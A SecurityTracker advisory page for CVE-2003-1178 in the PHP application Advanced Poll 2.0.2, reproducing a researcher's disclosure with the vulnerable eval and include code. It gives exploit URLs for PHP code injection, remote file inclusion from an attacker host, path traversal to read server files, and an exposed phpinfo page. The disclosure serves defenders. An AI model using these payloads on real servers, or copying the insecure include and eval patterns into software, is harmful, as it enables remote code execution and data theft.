SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Advanced Poll Vendors:   Chi Kien Uong
Advanced Poll Include File Error Lets Remote Users Execute Arbitrary PHP Code and Operating System Commands
SecurityTracker Alert ID:  1008005
SecurityTracker URL:  http://securitytracker.com/id/1008005
CVE Reference:   CVE-2003-1178   (Links to External Site)
Updated:  Oct 11 2006
Original Entry Date:  Oct 27 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0.2 (Textfile Version)
Description:   An include file vulnerability was reported in Advanced Poll. A remote user can execute arbitrary commands on the target server.

Frog-m@n reported that several scripts include files relative to variables that can be defined by the remote user. A remote user can define an alternate location for several of the variables to cause PHP code at the alternate location to be included and executed by the target server.

A demonstration exploit URL is provided:

http://[target]/admin/common.inc.php?basepath=http://[attacker]

The above URL will reportedly cause the 'http://[attacker]/lang/english.php' file to be included and executed on the target system.

Several other demonstration exploits are described in the Source Message.

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target system. The code will run with the privileges of the target web server.
Solution:   No vendor solution was available at the time of this entry. An unofficial patch is available at:

http://www.phpsecure.info

Vendor URL:  proxy2.de/scripts.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Advanced Poll : PHP Code Injection, File Include, Phpinfo


Informations :
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo


PHP Code/Location :

comments.php :

------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {
    if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = 
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
    } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = 
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
    } else {
        eval("\$$register_poll_vars[$i] = '';");
    }
}
[...]
------------------------------------------------------------------------------------------------------



booth.php, png.php :

---------------------------------------------------------------
<?php

$include_path = dirname(__FILE__);
if ($include_path == "/") {
    $include_path = ".";
}

if (!isset($PHP_SELF)) {
    global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
}

require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------


poll_ssi.php, popup.php :

----------------------
include "./booth.php";
----------------------




admin/common.inc.php :

---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
}

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
    include ("$base_path/lang/$pollvars[lang]");
} else {
    include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------


In the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

:

------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);

require "./common.inc.php";
[...]
------------------------------------


misc/info.php :

-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------


Exploits :

- if magic_quotes_gpc=OFF :

http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//

or with a POST form or cookies.

- This will only work if register_globals=OFF (this is not an error...) :

http://[target]/booth.php?include_path=http://[attacker] (or with png.php, 
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This will work if register_globals=OFF OR ON :

http://[target]/admin/common.inc.php?basepath=http://[attacker] will include 
the file http://[attacker]/lang/english.php.

The same hole can be found, in the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url 
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view 
will include the file http://[target]/admin/../../../file/to/view


- http://[target]/misc/info.php will show the phpinfo().


Solution/More details :
Both patch and details can be found on http://www.phpsecure.info .


Credits :
frog-m@n
http://www.phpsecure.info

_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC